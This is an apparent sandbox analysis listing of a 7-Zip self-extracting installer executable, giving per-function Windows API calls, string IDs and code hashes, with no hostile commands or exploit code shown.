                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%S/$%%S\
                                              • API String ID: 613200358-358529586
                                              • Opcode ID: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                              • Instruction ID: 4488bc9e4ce621475e7ac020b16d4e8be87a05eb600b5e71f20f3fc481b48b4f
                                              • Opcode Fuzzy Hash: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                              • Instruction Fuzzy Hash: 7811C975900109AACF05FFA2D856CEDBB78AF14308F10846AF561760E2DF789B99CB48
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%M/$%%M\
                                              • API String ID: 613200358-4143866494
                                              • Opcode ID: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                              • Instruction ID: 1e1ecd5a4810495ff1b5747c8ad1555e4ca49c286c4952b26a2a60c5b9476409
                                              • Opcode Fuzzy Hash: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                              • Instruction Fuzzy Hash: D411C971900109AACF05FFA2D856CEDBB79AF14308F10846AF551760E2DF785A9ACB58
                                              APIs
                                              • memset.MSVCRT ref: 00408519
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00408532
                                              • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0040854E
                                              • SHGetMalloc.SHELL32(00000000), ref: 00408578
                                                • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                              • String ID: A$A
                                              • API String ID: 1557639607-3025247501
                                              • Opcode ID: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                              • Instruction ID: 8e2b46382c4e0e79c38c40a6d9053323f47f27154f6d6a29afbbbbb9270b0dc0
                                              • Opcode Fuzzy Hash: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                              • Instruction Fuzzy Hash: 41114FB1A00204ABCB10DB95DA48BDE77BCAB88701F1400AEE905E7281DB79DE04CB75
                                              APIs
                                              • LoadLibraryA.KERNEL32(uxtheme,?,00409133,000004B1,00000000,?,?,?,?,?,00409240), ref: 00407DB4
                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407DC5
                                              • GetWindow.USER32(?,00000005), ref: 00407DDE
                                              • GetWindow.USER32(00000000,00000002), ref: 00407DF4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Window$AddressLibraryLoadProc
                                              • String ID: SetWindowTheme$uxtheme
                                              • API String ID: 324724604-1369271589
                                              • Opcode ID: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                              • Instruction ID: 9b0de1ac587a4165001920f6b170f50534138ecb837747bbddd8b6d978bb5341
                                              • Opcode Fuzzy Hash: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                              • Instruction Fuzzy Hash: D3F0A732E4672533C232126A6C48FAB769CDF46B51B094136BD04F7390DFA8DC4041ED
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@??3@memmove
                                              • String ID:
                                              • API String ID: 3828600508-0
                                              • Opcode ID: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                              • Instruction ID: 99a0ad40a844e9a3ffa9f049326f458531d7c56977f80c19912095adb51eb10a
                                              • Opcode Fuzzy Hash: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                              • Instruction Fuzzy Hash: 284159B56003048FCB14DF19D880A57B7E9FF88304F14856EEC4A9B346D779E919CBAA
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405A1E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405A80
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405A98
                                                • Part of subcall function 004039E7: lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                • Part of subcall function 004039E7: GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                • Part of subcall function 004039E7: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                • Part of subcall function 004039E7: ??3@YAXPAX@Z.MSVCRT ref: 00403B30
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                              • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                              • API String ID: 4038993085-372238525
                                              • Opcode ID: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                              • Instruction ID: 1d6f72d44ce7b26bafcc2ee4707833dd2b606594c716bb38fa5c6a696ed85d5e
                                              • Opcode Fuzzy Hash: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                              • Instruction Fuzzy Hash: 05311B7490022AAACF05EF92CD828EEBB79FF58318F10042BE810761E1DB795645DE58
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: wsprintf$ExitProcesslstrcat
                                              • String ID: 0x%p
                                              • API String ID: 2530384128-1745605757
                                              • Opcode ID: 07acdaa2a4fb6a660e9b007d09802e737d764b990db71bbf7c3e87babd82aa2f
                                              • Instruction ID: 10afd36f4070d89f293b01a92875ce402ef2d19f58a346a7dbf4abb5c9f18492
                                              • Opcode Fuzzy Hash: 07acdaa2a4fb6a660e9b007d09802e737d764b990db71bbf7c3e87babd82aa2f
                                              • Instruction Fuzzy Hash: 531182B5801208EFCB20EFB5DD85DDA73B8AF04304F00447BE645B3191D778AA948B5A
                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402E98
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402EA1
                                                • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT ref: 004011D7
                                                • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT ref: 004011FD
                                              • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402EB9
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402ED9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$EnvironmentExpandStrings$??2@
                                              • String ID: SetEnvironment
                                              • API String ID: 612612615-360490078
                                              • Opcode ID: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                              • Instruction ID: 9a1053b96c855abc576ef2a573940a7f22d1fb52882628247968529f0f67b02c
                                              • Opcode Fuzzy Hash: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                              • Instruction Fuzzy Hash: 66015276900104BADB14AB95DD819EEB7BCEF48314F10416BFD01B21D1DB786A408A99
                                              APIs
                                              • lstrlenW.KERNEL32(0041E3F0,00000020,?,?,?,?,?,00406547,?,?), ref: 004049C2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404A74
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404A7C
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404A8B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404A93
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$lstrlen
                                              • String ID:
                                              • API String ID: 2031685711-0
                                              • Opcode ID: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                              • Instruction ID: d6d6aeb9fd97b078be875a6c61f5694a486b541387e48e1a0363308d58f113ad
                                              • Opcode Fuzzy Hash: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                              • Instruction Fuzzy Hash: 2E21E3B6E40205ABCF206FB5CC029EB77A8EF84355F10447BEE41B72D1E7784D858A99
                                              APIs
                                                • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000B), ref: 004081F6
                                                • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000C), ref: 004081FF
                                              • GetSystemMetrics.USER32(00000007), ref: 0040883F
                                              • GetSystemMetrics.USER32(00000007), ref: 00408850
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408917
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$??3@
                                              • String ID: 100%%
                                              • API String ID: 2562992111-568723177
                                              • Opcode ID: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                              • Instruction ID: c0f787396fa6b3de95c2f82887938995bcf82f961e42ceb6ace71c8d1a060617
                                              • Opcode Fuzzy Hash: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                              • Instruction Fuzzy Hash: 51318171A007059FCB24EF6ACA459AEB7F4EF54704B00052ED982A72D1DB78FE44CB99
                                              APIs
                                              • lstrlenW.KERNEL32(00406EB0,00000000,?,ExecuteFile,0040454C,00000000,00000000,00406EB0,?,waitall,00000000,00000000,?,?,0041E9E8), ref: 00404512
                                              • lstrlenW.KERNEL32(?,?,?,0041E9E8), ref: 0040451B
                                              • _wcsnicmp.MSVCRT ref: 00404527
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: lstrlen$_wcsnicmp
                                              • String ID: ExecuteFile
                                              • API String ID: 2823567412-323923146
                                              • Opcode ID: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                              • Instruction ID: a2e0a5f2a3f105f817df911ac3b4dcd355adebb597ea1c4786e8ca368391ef02
                                              • Opcode Fuzzy Hash: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                              • Instruction Fuzzy Hash: BFE04FF25052156BC6008FA5AC84C5BBBADEAC8356B540877F700E3112E735D8198BA6
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00407200,00000000,?,?), ref: 004026BE
                                              • GetProcAddress.KERNEL32(00000000), ref: 004026C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32
                                              • API String ID: 2574300362-3900151262
                                              • Opcode ID: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                              • Instruction ID: 82409627fcb45dd1da2fa5f3e3d8c344d82775180731f09fcf798d9da7421b86
                                              • Opcode Fuzzy Hash: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                              • Instruction Fuzzy Hash: D4D0A7B4593608ABD7001B62EE0CFE276A56B40701F4480356400E00F0CBFD44D1CE1E
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00402735,?,0040713A,?,00000000,?,?), ref: 004026F0
                                              • GetProcAddress.KERNEL32(00000000), ref: 004026F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32
                                              • API String ID: 2574300362-736604160
                                              • Opcode ID: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                              • Instruction ID: 4151df8360ba703b2413aa493284ccd41186626ab8f45a3e4bc2e954db12d2dd
                                              • Opcode Fuzzy Hash: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                              • Instruction Fuzzy Hash: C7D0C9B86936046AD6505BA6AD0DFE6B6A4AB80B02F9880296804E11E1C6FC4491DA2F
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004031D2
                                                • Part of subcall function 00402DCE: MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000000,00403130,?,?,00000000,00000000,00000000), ref: 00402E00
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040313F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040315A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403162
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 1731127917-0
                                              • Opcode ID: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                              • Instruction ID: 048da0cb2dc02d8916bdec43440a285b354a653a086483b302c5f7621bf0cf9b
                                              • Opcode Fuzzy Hash: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                              • Instruction Fuzzy Hash: AD31F672804109AACB14EFA6DC829EF77BCEF04315B10443FF856B61E1EB3C9A45C668
                                              APIs
                                              • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00407468,00000000,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048C6
                                              • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048E3
                                              • wsprintfW.USER32 ref: 00404919
                                              • GetFileAttributesW.KERNEL32(?), ref: 00404934
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: PathTemp$AttributesFilewsprintf
                                              • String ID:
                                              • API String ID: 1746483863-0
                                              • Opcode ID: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                              • Instruction ID: 9a23dce76bf07ec62893e724c666a97d340ece38cae1712c454cfb59cab589fa
                                              • Opcode Fuzzy Hash: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                              • Instruction Fuzzy Hash: 5911E772200204BFD7119F55C845BAEB7B9FF84314F10842EF905D72E1DB79A9118B98
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@??3@ExceptionThrowmemcpy
                                              • String ID:
                                              • API String ID: 3462485524-0
                                              • Opcode ID: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
                                              • Instruction ID: 510514d82056c6b4fcd5a552fda661d2aed45214d42cdecf77f9d3eca8f48bd7
                                              • Opcode Fuzzy Hash: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
                                              • Instruction Fuzzy Hash: 0F110876200300ABCB289F16DAC0C9BF7EAAB84350720883FF569D7680C7B9ECD54758
                                              APIs
                                                • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                              • GetDlgItem.USER32(?,000004B7), ref: 00409222
                                              • SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                              • String ID:
                                              • API String ID: 3043669009-0
                                              • Opcode ID: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                              • Instruction ID: 3591c2bc138905537439c0aaf451187a84050bff03ea83390e11aea9625765cd
                                              • Opcode Fuzzy Hash: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                              • Instruction Fuzzy Hash: B911C271F40314ABDB10EBA99D09F9A77BCAB84B04F00446FB241E32D1CAB899008B59
                                              APIs
                                              • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00407825
                                              • GetSystemMetrics.USER32(00000031), ref: 0040784B
                                              • CreateFontIndirectW.GDI32(?), ref: 0040785A
